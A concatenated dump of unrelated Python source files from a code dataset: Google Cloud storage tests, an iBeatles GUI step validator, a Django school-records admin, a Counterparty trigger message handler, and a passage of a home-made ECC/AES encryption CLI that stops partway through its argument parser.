with TemporaryFile() as testfile:
testfile.write(content)
testfile.seek(0)
storage.save(name, testfile)
def test_should_create_blob_at_correct_path(self, storage):
with TemporaryFile() as testfile:
testfile.write(self.TEST_FILE_CONTENT)
testfile.seek(0)
storage_path = storage.save(self.TEST_FILE_NAME, testfile)
assert storage_path == self.TEST_FILE_NAME
def test_should_create_a_valid_client_object(self, storage):
with pytest.raises(gcloud.exceptions.NotFound):
storage.client.get_bucket("some_random_bucket_name_that_doesnt_exist")
def test_should_create_a_valid_bucket_object(self, storage):
assert storage.bucket.exists()
def test_should_be_able_to_save_and_open_files(self, storage):
self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
f = storage.open(self.TEST_FILE_NAME)
assert f.read() == self.TEST_FILE_CONTENT
def test_should_return_created_time(self, storage):
self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
assert isinstance(storage.created_time(self.TEST_FILE_NAME), datetime.datetime)
def test_should_return_modified_time(self, storage):
self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
assert isinstance(storage.modified_time(self.TEST_FILE_NAME), datetime.datetime)
def test_should_be_able_to_delete_files(self, storage):
self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
storage.delete(self.TEST_FILE_NAME)
# Should not raise an exception by gcloud
assert storage.delete("missing_file") is None
def test_exists_method(self, storage):
assert not storage.exists(self.TEST_FILE_NAME)
self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
assert storage.exists(self.TEST_FILE_NAME)
def test_should_return_correct_file_size(self, storage):
self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
assert storage.size(self.TEST_FILE_NAME) == len(self.TEST_FILE_CONTENT)
def test_should_return_publicly_downloadable_url(self, storage):
self.upload_test_file(storage, self.TEST_FILE_NAME, self.TEST_FILE_CONTENT)
assert urlopen(storage.url(self.TEST_FILE_NAME)).read() == self.TEST_FILE_CONTENT
def test_should_work_with_utf8(self, storage):
self.upload_test_file(storage, self.TEST_FILE_NAME_UNICODE, self.TEST_FILE_CONTENT)
storage.exists(self.TEST_FILE_NAME_UNICODE)
# Don't explode when trying to find a available name for existing files...
self.upload_test_file(storage, self.TEST_FILE_NAME_UNICODE, self.TEST_FILE_CONTENT)
def test_should_be_able_to_list_dirs_and_files(self, storage):
subdir_file_pattern = "/subdir/%s.%d"
for i in range(1, 11):
self.upload_test_file(storage, subdir_file_pattern % (self.TEST_FILE_NAME, i), "")
self.upload_test_file(storage, "/subdir/a/" + self.TEST_FILE_NAME, "")
self.upload_test_file(storage, "/subdir/b/" + self.TEST_FILE_NAME, "")
# Make sure paths prefixed with a slash are normalized
assert storage.listdir("") == storage.listdir("/")
assert storage.listdir("subdir") == storage.listdir("/subdir")
root_list_dir = storage.listdir("")
assert len(root_list_dir[0]) == 1 and len(root_list_dir[1]) == 0
assert root_list_dir[0] == ["subdir"]
subdir_list_dir = storage.listdir("subdir/")
assert len(subdir_list_dir[0]) == 2 and len(subdir_list_dir[1]) == 10
assert subdir_list_dir[0] == ["a", "b"]
assert subdir_list_dir[1][0] == "%s.%d" % (self.TEST_FILE_NAME, 1)
def test_should_not_overwrite_files_on_save(self, storage):
self.upload_test_file(storage, self.TEST_FILE_NAME, "")
self.upload_test_file(storage, self.TEST_FILE_NAME, "")
assert len(storage.listdir("")[1]) == 2
def test_changed_files_should_be_reuploaded(self, storage):
self.upload_test_file(storage, self.TEST_FILE_NAME, "")
first_modified_time = storage.modified_time(self.TEST_FILE_NAME)
local_tmpfile = storage.open(self.TEST_FILE_NAME)
assert local_tmpfile.read() == "".encode("ascii")
local_tmpfile.seek(0)
local_tmpfile.write(self.TEST_FILE_CONTENT)
local_tmpfile.close()
assert storage.open(self.TEST_FILE_NAME).read() == self.TEST_FILE_CONTENT
assert storage.modified_time(self.TEST_FILE_NAME) != first_modified_time
| 1.976563 | 2 |
src/iBeatles/all_steps/event_handler.py | ornlneutronimaging/iBeatles | 3 | 12765118 | <gh_stars>1-10
from .. import DataType
from ..utilities.status_message_config import StatusMessageStatus, show_status_message
from qtpy.QtWidgets import QMessageBox
import logging
class EventHandler:
def __init__(self, parent=None, data_type='sample'):
self.parent = parent
self.data_type = data_type
def _display_status_message_warning(self, message=""):
show_status_message(parent=self.parent,
status=StatusMessageStatus.warning,
message=message,
duration_s=5)
def is_step_selected_allowed(self, step_index_requested=0):
""" 0: load data
1: normalization
2: normalized
3: bin
4: fit
5: strain mapping
6: rotation
"""
# load tab
# validate all the time
if step_index_requested == 0:
return True
# normalization
# validate only if data loaded
if step_index_requested == 1:
if self.parent.data_metadata[DataType.sample]['data'] == []:
message = "Please load some sample data!"
self._display_status_message_warning(message=message)
self._display_message_box(message=message)
EventHandler._update_logging(step_requested=step_index_requested,
message=message)
return False
return True
# normalized
# validate all the time
if step_index_requested == 2:
return True
# bin
# validate only if normalized data loaded
if step_index_requested == 3:
if self.parent.data_metadata[DataType.normalized]['data'] == []:
message = "Please load some normalized data!"
self._display_status_message_warning(message=message)
self._display_message_box(message=message)
EventHandler._update_logging(step_requested=step_index_requested,
message=message)
return False
return True
# fitting
# validate if there is a bin region selected
if step_index_requested == 4:
if self.parent.data_metadata[DataType.normalized]['data'] == []:
message = "Please load some normalized data!"
self._display_status_message_warning(message=message)
self._display_message_box(message=message)
EventHandler._update_logging(step_requested=step_index_requested,
message=message)
return False
if not self.parent.there_is_a_roi:
message = "Please select a region to bin first (step binning)!"
self._display_status_message_warning(message=message)
self._display_message_box(message=message)
EventHandler._update_logging(step_requested=step_index_requested,
message=message)
return False
return True
# strain mapping
# validate if fitting has been performed
if step_index_requested == 5:
if self.parent.table_dictionary == {}:
message = "Please fit the data to be able to visualize the strain mapping!"
self._display_status_message_warning(message=message)
self._display_message_box(message=message)
EventHandler._update_logging(step_requested=step_index_requested,
message=message)
return False
return True
# rotation
# validate if normalized data loaded
if step_index_requested == 6:
if self.parent.data_metadata[DataType.normalized]['data'] == []:
message = "Please load some normalized data!"
self._display_status_message_warning(message=message)
self._display_message_box(message=message)
EventHandler._update_logging(step_requested=step_index_requested,
message=message)
return False
return True
return True
def _display_message_box(self, message=""):
dlg = QMessageBox(self.parent)
dlg.setWindowTitle("Unable to start this step!")
dlg.setText(message)
dlg.setStandardButtons(QMessageBox.Ok)
dlg.setIcon(QMessageBox.Warning)
button = dlg.exec()
if button == QMessageBox.Ok:
dlg.close()
@staticmethod
def _update_logging(step_requested=-1, message=""):
logging.info(f"Error requesting step #{step_requested}")
logging.info(message)
| 2.125 | 2 |
sis/admin.py | rectory-school/rectory-apps-updated | 0 | 12765119 | <gh_stars>0
"""SIS Admin"""
from datetime import date, timedelta
from django.contrib import admin
from django.db.models import Count, Max
from django.utils.translation import gettext_lazy as _
from solo.admin import SingletonModelAdmin
from . import models
class ViewOnlyAdminMixin:
"""Admin view for mixin that provides view-only access"""
def has_add_permission(self, request) -> bool:
del request
return False
def has_delete_permission(self, request, obj=None) -> bool:
del request, obj
return False
def has_change_permission(self, request, obj=None) -> bool:
del request, obj
return False
@admin.register(models.Config)
class ConfigAdmin(SingletonModelAdmin):
"""Admin for the SIS configurations"""
@admin.register(models.AcademicYear)
class AcademicYearAdmin(admin.ModelAdmin):
"""Academic year admin"""
@admin.register(models.Student)
class StudentAdmin(ViewOnlyAdminMixin, admin.ModelAdmin):
"""Read-only student admin"""
@admin.register(models.Teacher)
class TeacherAdmin(ViewOnlyAdminMixin, admin.ModelAdmin):
"""View-only teacher admin"""
search_fields = ['last_name', 'first_name', 'email', 'teacher_id', 'unique_name', ]
list_filter = ['active']
list_display = ['name', 'email', 'active']
@admin.register(models.Dorm)
class DormAdmin(admin.ModelAdmin):
"""Dorm admin"""
@admin.register(models.Grade)
class GradeAdmin(admin.ModelAdmin):
"""Grade admin"""
readonly_fields = ['grade']
def has_add_permission(self, request) -> bool:
return False
@admin.register(models.Enrollment)
class EnrollmentAdmin(ViewOnlyAdminMixin, admin.ModelAdmin):
"""View only enrollment admin"""
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related('student', 'academic_year')
list_display = ['__str__', 'boarder']
list_filter = ['academic_year', 'grade', 'boarder', 'status_attending', 'status_enrollment']
@admin.register(models.Course)
class CourseAdmin(ViewOnlyAdminMixin, admin.ModelAdmin):
"""View only course admin"""
@admin.register(models.Section)
class SectionAdmin(ViewOnlyAdminMixin, admin.ModelAdmin):
"""View only section admin"""
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related('academic_year')
@admin.register(models.StudentRegistration)
class StudentRegistrationAdmin(ViewOnlyAdminMixin, admin.ModelAdmin):
"""View only student registration admin"""
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related('section__academic_year', 'section', 'student')
@admin.register(models.Parent)
class ParentAdmin(ViewOnlyAdminMixin, admin.ModelAdmin):
"""View only parent admin"""
list_display = ['full_id', 'full_name', 'first_name', 'last_name']
class DetentionUsed(admin.SimpleListFilter):
"""Filter for the last time a detention was used"""
parameter_name = 'used_recently'
title = _('used recently')
def lookups(self, request, model_admin):
return (
('365', _('Within the last year')),
('30', _('Within the last month')),
)
def queryset(self, request, queryset):
if not self.value():
return queryset
limit = int(self.value())
queryset = queryset.annotate(latest_detention=Max('detentions__date'))
return queryset.filter(latest_detention__gte=date.today() - timedelta(days=limit))
@admin.register(models.DetentionOffense)
class DetentionOffenseView(admin.ModelAdmin):
"""Detention offense model admin"""
readonly_fields = ['offense']
list_filter = ['send_mail', DetentionUsed]
list_display = ['__str__', 'send_mail']
def get_queryset(self, request):
qs = super().get_queryset(request)
# qs = qs.filter(latest_detention__gte=date.today() - timedelta(days=365))
return qs
def has_add_permission(self, request) -> bool:
return False
@admin.register(models.DetentionCode)
class DetentionCodeAdmin(admin.ModelAdmin):
"""Admin for detention codes"""
readonly_fields = ['code']
def has_add_permission(self, request) -> bool:
return False
@admin.register(models.Detention)
class DetentionAdmin(ViewOnlyAdminMixin, admin.ModelAdmin):
"""View only admin for detentions"""
list_filter = ['date', 'code']
def get_queryset(self, request):
qs = super().get_queryset(request)
return qs.select_related('code', 'offense', 'student')
| 2.109375 | 2 |
counterpartylib/lib/messages/trigger.py | monaparty/counterparty-lib | 9 | 12765120 | <filename>counterpartylib/lib/messages/trigger.py
#! /usr/bin/python3
"""
target_hash is the hash of a trigger.
"""
import binascii
import struct
import json
import logging
logger = logging.getLogger(__name__)
from counterpartylib.lib import (config, exceptions, util, message_type)
from . import (order, bet, rps)
from counterpartylib.lib.messages.triggers import (asset_metadata)
FORMAT = '>32s'
LENGTH = 32
ID = 120
receivers = [
asset_metadata.asset_metadata_receiver,
]
def initialise (db):
cursor = db.cursor()
cursor.execute('''CREATE TABLE IF NOT EXISTS triggers(
tx_index INTEGER PRIMARY KEY,
tx_hash TEXT UNIQUE,
block_index INTEGER,
source TEXT,
target_hash TEXT,
payload BLOB,
status TEXT,
FOREIGN KEY (tx_index, tx_hash, block_index) REFERENCES transactions(tx_index, tx_hash, block_index))
''')
# Offer hash is not a foreign key. (And it cannot be, because of some invalid triggers.)
cursor.execute('''CREATE INDEX IF NOT EXISTS
block_index_idx ON triggers (block_index)
''')
cursor.execute('''CREATE INDEX IF NOT EXISTS
source_idx ON triggers (source)
''')
for receiver in receivers:
receiver.initialise(db)
def validate (db, source, target_hash, payload_bytes):
problems = []
targets = []
target_type = None
cursor = db.cursor()
receiver_instance = None
for receiver in receivers:
sql = 'SELECT tx_hash FROM ' + receiver.target_table_name() + ' WHERE tx_hash = ?'
cursor.execute(sql, (target_hash,))
targets = cursor.fetchall()
if targets:
assert receiver_instance is None
assert len(targets) == 1
receiver_instance = receiver(db, source, target_hash, payload_bytes)
problems += receiver_instance.validate()
if receiver_instance is None:
problems.append('no trigger target with that hash')
fee = int(0.001 * config.UNIT)
cursor.execute('''SELECT * FROM balances
WHERE (address = ? AND asset = ?)''', (source, config.XCP))
balances = cursor.fetchall()
if not balances or balances[0]['quantity'] < fee:
problems.append('insufficient funds')
return receiver_instance, fee, problems
def compose (db, source, target_hash, payload, payload_is_hex):
# convert memo to memo_bytes based on memo_is_hex setting
if payload is None:
payload_bytes = b''
elif payload_is_hex:
try:
payload_bytes = bytes.fromhex(payload)
except ValueError:
raise exceptions.ComposeError(['failed to convert the payload'])
else:
payload_bytes = struct.pack(">{}s".format(len(payload)),
payload.encode('utf-8'))
# Check that target exists.
_, _, problems = validate(db, source, target_hash, payload_bytes)
if problems: raise exceptions.ComposeError(problems)
target_hash_bytes = binascii.unhexlify(bytes(target_hash, 'utf-8'))
data = message_type.pack(ID)
data += struct.pack(FORMAT, target_hash_bytes)
data += payload_bytes
return (source, [], data)
def parse (db, tx, message):
cursor = db.cursor()
status = 'valid'
if tx['block_hash'] == 'mempool':
return
# Unpack message.
try:
# account for memo bytes
payload_bytes_length = len(message) - LENGTH
if payload_bytes_length < 0:
raise exceptions.UnpackError('invalid message length')
struct_format = FORMAT + ('{}s'.format(payload_bytes_length))
target_hash_bytes, payload_bytes = struct.unpack(struct_format, message)
target_hash = binascii.hexlify(target_hash_bytes).decode('utf-8')
except (exceptions.UnpackError, struct.error):
target_hash = None
payload_bytes = None
status = 'invalid: could not unpack'
if status == 'valid':
receiver, fee, problems = validate(db, tx['source'], target_hash, payload_bytes)
if problems:
status = 'invalid: ' + '; '.join(problems)
if status == 'valid':
try:
problems += receiver.execute(tx)
if problems:
status = 'invalid: ' + '; '.join(problems)
except:
status = 'invalid: execution failed'
# Add parsed transaction to message-type–specific table.
bindings = {
'tx_index': tx['tx_index'],
'tx_hash': tx['tx_hash'],
'block_index': tx['block_index'],
'source': tx['source'],
'target_hash': target_hash,
'payload': payload_bytes,
'status': status,
}
if "integer overflow" not in status:
sql='INSERT INTO triggers VALUES (:tx_index, :tx_hash, :block_index, :source, :target_hash, :payload, :status)'
cursor.execute(sql, bindings)
else:
logger.warn("Not storing [trigger] tx [%s]: %s", tx['tx_hash'], status)
logger.debug("Bindings: %s", json.dumps(bindings))
if status == 'valid':
util.debit(db, tx['source'], config.XCP, fee, action="trigger fee", event=tx['tx_hash'])
cursor.close()
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
| 2.21875 | 2 |
fincrypt.py | ThePlasmaRailgun/CryptoChallenge | 1 | 12765121 | <reponame>ThePlasmaRailgun/CryptoChallenge<filename>fincrypt.py
#!/usr/bin/env python3
import sha
import sys
import os
import argparse
import base64
import zlib
import randomart
import re
import ecc
import reedsolomon
import oaep
from asn1spec import FinCryptPublicKey, FinCryptPrivateKey, FinCryptMessage
from pyasn1.codec.ber.decoder import decode as decode_ber
from pyasn1.codec.native.encoder import encode as encode_native
from pyasn1.codec.der.encoder import encode as encode_der
from aes import Decrypter, Encrypter, AESModeOfOperationCBC
BASE_PATH = os.path.dirname(__file__)
PUBLIC_PATH = os.path.join(BASE_PATH, 'public_keys')
PRIVATE_KEY = os.path.join(BASE_PATH, 'private_key', 'private.asc')
def _flatten(l):
return [item for sublist in l for item in sublist]
class FinCryptDecodingError(Exception):
def __init__(self, *args, **kwargs):
Exception.__init__(self, *args, **kwargs)
def get_blocks(message, block_size=256):
"""
Splits a message (bytes) into blocks of size block_size, then encodes each block
as a base 256 integer. Can be reversed using get_bytes
:param message: Message (bytes)
:param block_size: Block size (int)
:return: Blocks (list of int)
"""
block_nums = []
for block in [message[i:i + block_size] for i in range(0, len(message), block_size)]:
block_num = 0
block = block[::-1]
for i, char in enumerate(block):
block_num += char * (256 ** i)
block_nums.append(block_num)
return block_nums
def get_bytes(block_nums):
"""
Takes an array of block integers and turns them back into a bytes object.
Decodes using base 256.
:param block_nums: Blocks (list of ints)
:return: Original data (bytes)
"""
message = []
for block in block_nums:
block_text = []
while block:
message_num = block % 256
block = block // 256
block_text.append(bytes([message_num]))
block_text.reverse()
message.extend(block_text)
return b''.join(message)
def sign_number(k, num):
"""
Sign a number using ECDSA.
Number must have a lower bit length than ecc.CURVE.n
:param k: ECC Private key scalar (int)
:param num: Number to sign (int)
:return: Tuple(r (int), s (int))
"""
dsa = ecc.ECDSA(ecc.CURVE)
return dsa.sign(num, ecc.ECPrivateKey(k, ecc.CURVE))
def validate_number(kx, ky, r, s, num):
"""
Validate an r and an s using ECDSA
:param kx: Public key kx (int)
:param ky: Public key ky (int)
:param r: r value of signature (int)
:param s: s value of signature (int)
:param num: Number value to validate (int)
:return: Whether signature is valid (bool)
"""
dsa = ecc.ECDSA(ecc.CURVE)
return dsa.validate(r, s, num, ecc.ECPublicKey(ecc.AffineCurvePoint(kx, ky, ecc.CURVE)))
def encrypt_message(kx, ky, message):
"""
Encrypts a message using ECC and AES-256
First generates a random AES key and IV with os.urandom()
Then encrypts the original message with that key
Then encrypts the AES key with the ECC key
NOTE:
This means that plaintext will not have the same ciphertext
when encrypted twice. Keep this in mind if you require reproducibility behavior
:param kx: Public key kx (int)
:param ky: Public key ky (int)
:param message: Message (bytes)
:return: Tuple (encrypted key (list of ints), encrypted IV (list of ints),
and encrypted message (bytes))
"""
ecies = ecc.ECEIS(ecc.CURVE)
r, s = ecies.exchange(ecc.ECPublicKey(ecc.AffineCurvePoint(kx, ky, ecc.CURVE)))
s = str(s).encode('utf-8')
key = sha.SHA3_512(s).digest()
message_encryptor = Encrypter(mode=AESModeOfOperationCBC(key[:32], iv=key[32:48]))
encrypted_blocks = message_encryptor.feed(oaep.oaep_pad(message))
encrypted_blocks += message_encryptor.feed()
encrypted_key = r.x, r.y
return encrypted_key, encrypted_blocks
def decrypt_message(k, encrypted_key, encrypted_message):
"""
Decrypts a message encrypted by the encrypt_message function
First decrypts the AES key and IV using ECC
Then decrypts the data using the AES key and IV
:param k: Private key k
:param encrypted_key: ECC encrypted key (list of of ints)
:param encrypted_message: AES encrypted data (bytes
:return: Decrypted data (bytes)
"""
ecies = ecc.ECEIS(ecc.CURVE)
r = ecc.AffineCurvePoint(encrypted_key[0], encrypted_key[1], ecc.CURVE)
s = ecies.recover(r, ecc.ECPrivateKey(k, ecc.CURVE))
s = str(s).encode('utf-8')
key = sha.SHA3_512(s).digest()
message_decryptor = Decrypter(mode=AESModeOfOperationCBC(key[:32], iv=key[32:48]))
decrypted_message = message_decryptor.feed(encrypted_message)
decrypted_message += message_decryptor.feed()
return oaep.oaep_unpad(decrypted_message)
def sign_message(k, message):
"""
Signs a message using an ECDSA signature private key and a message,
Computes SHA512 hash of plaintext and then performs ECDSA signature upon it
:param k: ECC key k
:param message: Message to sign (bytes)
:return: Signature (list of ints)
"""
message_hash = sha.SHA3_512(message).digest()
block = get_blocks(message_hash, 1024)
return sign_number(k, block[0])
def authenticate_message(kx, ky, plaintext, signature):
"""
Authenticates a message when given a plaintext and signature
Verifies hash with ECDSA public key
:param kx: ECC Public key kx
:param ky: ECC Public key ky
:param plaintext: Decrypted plaintext to verify (bytes)
:param signature: The signature (list of ints)
:return: Whether the message signature is valid (boolean)
"""
message_hash = sha.SHA3_512(plaintext).digest()
block = get_blocks(message_hash, 1024)
return validate_number(kx, ky, signature[0], signature[1], block[0])
def strip_headers(pem_text):
"""
Strips the headers off a a FinCrypt key or message.
:param pem_text: Text of key or message (string)
:return: Tuple (header (ie. 'BEGIN FINCRYPT MESSAGE'), base64 (string))
"""
match = re.match(
r'(?:-+ (BEGIN FINCRYPT (?:PUBLIC |PRIVATE )?(?:KEY|MESSAGE)) -+\n)([a-zA-Z0-9\n\-_=]+[^\n])'
r'(?:\n-+ END FINCRYPT (?:PUBLIC |PRIVATE )?(?:KEY|MESSAGE) -+)', pem_text)
if match is None:
return None, None
return match[1], match[2]
def read_message(message_text):
"""
Reads a message, strips off and validates headers.
Raises ValueError if the message was malformed.
:param message_text: Message text (string)
:return: Base64 of message (string)
"""
header, message = strip_headers(message_text)
if header != 'BEGIN FINCRYPT MESSAGE':
raise ValueError('Message was malformed.')
return message
def read_public_key(key_text):
"""
Reads a FinCrypt public key. Returns a dictionary of all public key values.
Raises exception if key is malformed or unreadable.
The ASN.1 specification for a FinCrypt public key resides in asn1spec.py
:param key_text: Key text (string)
:return: Dictionary of all key ASN.1 values
"""
key_header, key_text = strip_headers(key_text)
if key_header is None or key_header != 'BEGIN FINCRYPT PUBLIC KEY':
raise ValueError
b64_decoded = base64.urlsafe_b64decode(key_text.encode('utf-8'))
rsc = reedsolomon.RSCodec(30)
b64_decoded = bytes(rsc.decode(b64_decoded)[0])
key, _ = decode_ber(b64_decoded, asn1Spec=FinCryptPublicKey())
key = encode_native(key)
return {'kx': key['kx'], 'ky': key['ky'], 'name': key['name'], 'email': key['email']}
def read_private_key(key_text):
"""
Reads a FinCrypt private key. Returns a dictionary of all usable private key values.
Raises an exception if key is malformed or unreadable.
The ASN.1 specification for a FinCrypt private key resides in asn1spec.py
:param key_text: Key text (string)
:return: Dictionary of all key ASN.1 values except for primes P and Q
"""
key_header, key_text = strip_headers(key_text)
if key_header is None or key_header != 'BEGIN FINCRYPT PRIVATE KEY':
raise ValueError
b64_decoded = base64.urlsafe_b64decode(key_text.encode('utf-8'))
key, _ = decode_ber(b64_decoded, asn1Spec=FinCryptPrivateKey())
key = encode_native(key)
return {'k': key['k'], 'name': key['name'], 'email': key['email']}
def encrypt_and_sign(message, recipient_key, signer_key):
"""
Encrypts and signs a message using a recipient's public key name
Looks for the recipient's public key in the public_keys/ directory.
Looks for your private key as private_key/private.asc
The ASN.1 specification for a FinCrypt message resides in asn1spec.py
Raises exceptions if key files are not found, or are malformed.
:param message: Message to encrypt (bytes)
:param recipient_key: Recipient's public key (file like object)
:param signer_key: Signer's private key (file like object)
:return: Bytes of encrypted and encoded message and signature.
"""
try:
recipient_key = read_public_key(recipient_key.read())
except Exception:
raise FinCryptDecodingError('Recipient keyfile was malformed.')
try:
signer_key = read_private_key(signer_key.read())
except Exception:
raise FinCryptDecodingError('Private key file is malformed.')
try:
encrypted_key, encrypted_blocks = encrypt_message(recipient_key['kx'], recipient_key['ky'],
message)
except Exception:
raise FinCryptDecodingError('Unknown error encountered when encrypting message.')
signature = sign_message(signer_key['k'], message)
encrypted_message = FinCryptMessage()
encrypted_message['message'] = encrypted_blocks
encrypted_message['key'].extend(encrypted_key)
encrypted_message['signature'].extend(signature)
encoded_message = encode_der(encrypted_message)
rsc = reedsolomon.RSCodec(8)
encoded_message = bytes(rsc.encode(encoded_message))
return encoded_message
def decrypt_and_verify(message, sender_key, private_key):
"""
Decrypts and verifies a message using a sender's public key name
Looks for the sender's public key in the public_keys/ directory.
Looks for your private key as private_key/private.asc
The ASN.1 specification for a FinCrypt message resides in asn1spec.py
Raises exceptions if key files are not found, or are malformed.
:param message: Message to decrypt (bytes)
:param private_key: Decrypter's private key (file like object)
:param sender_key: Sender's public key (file like object)
:return: Tuple (decrypted message (bytes), whether the message was verified (boolean))
If message was unable to be decrypted, the tuple will be (None, False)
"""
try:
decryption_key = read_private_key(private_key.read())
except Exception:
raise FinCryptDecodingError('Private key file is malformed.')
try:
sender_key = read_public_key(sender_key.read())
except Exception:
raise FinCryptDecodingError('Sender key file is malformed.')
try:
rsc = reedsolomon.RSCodec(8)
message = bytes(rsc.decode(message)[0])
decoded, _ = decode_ber(message, asn1Spec=FinCryptMessage())
decoded = encode_native(decoded)
except Exception:
return None, False
try:
decrypted_message = decrypt_message(decryption_key['k'], decoded['key'], decoded['message'])
except Exception:
decrypted_message = None
try:
authenticated = authenticate_message(sender_key['kx'], sender_key['ky'], decrypted_message,
decoded['signature'])
except Exception:
authenticated = False
return decrypted_message, authenticated
def encrypt_text(arguments):
"""
Encrypts a file object when given a argparser arguments object. Not intended for use as an import.
Outputs the resulting encrypted file as a FinCrypt message in plaintext.
Writes resulting encrypted message to stdout.
:param arguments: Argparser arguments object.
:return: None
"""
recipient_keyfile = os.path.join(PUBLIC_PATH, arguments.recipient)
if not os.path.exists(recipient_keyfile):
raise FileNotFoundError('Recipient keyfile does not exist.')
if not os.path.exists(PRIVATE_KEY):
raise FileNotFoundError('Private keyfile does not exist.')
with open(recipient_keyfile) as recipient_key, open(PRIVATE_KEY) as private_key:
message = encrypt_and_sign(zlib.compress(arguments.infile.read(), level=9), recipient_key, private_key)
message = base64.urlsafe_b64encode(message).decode('utf-8')
sys.stdout.write(' BEGIN FINCRYPT MESSAGE '.center(76, '-') + '\n')
sys.stdout.write('\n'.join([message[i:i + 76] for i in range(0, len(message), 76)]))
sys.stdout.write('\n' + ' END FINCRYPT MESSAGE '.center(76, '-'))
def decrypt_text(arguments):
"""
Decrypts a file object when given a argparser arguments object. Not intended for use as an import.
Reads the file object as a FinCrypt message in plaintext.
Writes resulting decrypted bytes to stdout.
:param arguments: Argparser arguments object.
:return: None
"""
sender_keyfile = os.path.join(PUBLIC_PATH, arguments.sender)
if not os.path.exists(sender_keyfile):
raise FileNotFoundError('Sender keyfile does not exist.')
if not os.path.exists(PRIVATE_KEY):
raise FileNotFoundError('Private keyfile does not exist.')
try:
in_message = read_message(arguments.infile.read())
in_message = ''.join(in_message.split('\n'))
in_message = base64.urlsafe_b64decode(in_message)
except Exception:
sys.stderr.write('Message was malformed.\n')
return
try:
with open(PRIVATE_KEY) as private_key, open(sender_keyfile) as sender_key:
message, verified = decrypt_and_verify(in_message, sender_key, private_key)
except Exception as e:
sys.stderr.write(str(e) + '\n')
return
if message is None:
sys.stderr.write('Decryption failed.\n')
else:
try:
sys.stdout.buffer.write(zlib.decompress(message))
except Exception:
sys.stderr.write('Decompression failed.\n')
if not verified:
sys.stderr.write('Verification failed. Message is not intact.\n')
def encrypt_binary(arguments):
"""
Encrypts a file object when given a argparser arguments object. Not intended for use as an import.
Outputs the resulting encrypted file as a FinCrypt message in binary encoding.
Writes resulting encrypted message to stdout.
:param arguments: Argparser arguments object.
:return: None
"""
recipient_keyfile = os.path.join(PUBLIC_PATH, arguments.recipient)
if not os.path.exists(recipient_keyfile):
raise FileNotFoundError('Recipient keyfile does not exist.')
if not os.path.exists(PRIVATE_KEY):
raise FileNotFoundError('Private keyfile does not exist.')
with open(recipient_keyfile) as recipient_key, open(PRIVATE_KEY) as private_key:
message = encrypt_and_sign(zlib.compress(arguments.infile.read(), level=9), recipient_key, private_key)
sys.stdout.buffer.write(message)
def decrypt_binary(arguments):
"""
Decrypts a file object when given a argparser arguments object. Not intended for use as an import.
Reads the file object as a FinCrypt message in binary encoding.
Writes resulting decrypted bytes to stdout.
:param arguments: Argparser arguments object
:return: None
"""
sender_keyfile = os.path.join(PUBLIC_PATH, arguments.sender)
if not os.path.exists(sender_keyfile):
raise FileNotFoundError('Sender keyfile does not exist.')
if not os.path.exists(PRIVATE_KEY):
raise FileNotFoundError('Private keyfile does not exist.')
in_message = arguments.infile.read()
try:
with open(PRIVATE_KEY) as private_key, open(sender_keyfile) as sender_key:
message, verified = decrypt_and_verify(in_message, sender_key, private_key)
except Exception as e:
sys.stderr.write(str(e) + '\n')
return
if message is None:
sys.stderr.write('Decryption failed.\n')
else:
try:
sys.stdout.buffer.write(zlib.decompress(message))
except Exception:
sys.stderr.write('Decompression failed.\n')
if not verified:
sys.stderr.write('Verification failed. Message is not intact.\n')
def enum_keys(arguments):
"""
Enumerates all keys residing in the public_keys directory.
Prints to stdout a formatted explanation of the key, with:
Filename
User Name
Email
Hash
Randomart
:param arguments: Argparser arguments object
:return: None
"""
key_enum = ''
for key_file in os.listdir(PUBLIC_PATH):
with open(os.path.join(PUBLIC_PATH, key_file)) as f:
key_text = f.read()
key = read_public_key(key_text)
key_hash = sha.SHA3_512(key_text.encode('utf-8')).hexdigest()
key_hash_formatted = ':'.join([key_hash[:64][i:i + 2] for i in range(0, len(key_hash[:64]), 2)]).upper()
# Only use the first 64 characters of the hash so it fills up less of the board.
key_randomart = randomart.RandomArt(hashalg='FinCrypt', room_size=(31, 15))
key_randomart = key_randomart(key_hash)
formatted_key = f"{key_file}:\nName: {key['name'].decode('utf-8')}\nEmail: {key['email'].decode('utf-8')}" \
f"\nHash: {key_hash_formatted}\nKeyArt:\n{key_randomart}"
key_enum += formatted_key + '\n\n'
sys.stdout.write(key_enum.strip())
def main():
"""
Parses command line arguments.
Try fincrypt.py -h for help with arguments.
:return: None
"""
parser = argparse.ArgumentParser(
description='Encrypt and decrypt using FinCrypt. Place your private key as '
'./private_key/private.asc, and distribute your public key.')
parser.add_argument('--enumerate-keys', '-N', action='store_const', dest='func', const=enum_keys)
subparsers = parser.add_subparsers(title='sub-commands', description='Encryption and decryption sub-commands')
parser_encrypt = subparsers.add_parser('encrypt', aliases=['e'], help='Encrypt a message/file.')
parser_encrypt.add_argument('recipient', type=str, default=None,
help='The filename of the recipient\'s public key. '
'Always defaults to the /public_keys directory.')
parser_encrypt.add_argument('infile', nargs='?', type=argparse.FileType('rb'), default=sys.stdin.buffer,
help='File to encrypt. Defaults to stdin.')
parser_encrypt.set_defaults(func=encrypt_text)
parser_decrypt = subparsers.add_parser('decrypt', aliases=['d'], help='Decrypt a message.')
parser_decrypt.add_argument('sender', type=str, default=None,
help='The filename of the sender\'s public key. '
'Always defaults to the /public_keys directory.')
parser_decrypt.add_argument('infile', nargs='?', type=argparse.FileType('r'), default=sys.stdin,
help='The filename or path of the encrypted file. Defaults to stdin.')
parser_decrypt.set_defaults(func=decrypt_text)
parser_encrypt_binary = subparsers.add_parser('encryptbin', aliases=['eb'],
help='Encrypt a message/file with binary encoding. '
'Provides space savings at the cost of readability.')
parser_encrypt_binary.add_argument('recipient', type=str, default=None,
help='The filename of the recipient\'s public key. '
'Always defaults to the /public_keys directory.')
parser_encrypt_binary.add_argument('infile', nargs='?', type=argparse.FileType('rb'), default=sys.stdin.buffer,
help='File to encrypt. Defaults to stdin.')
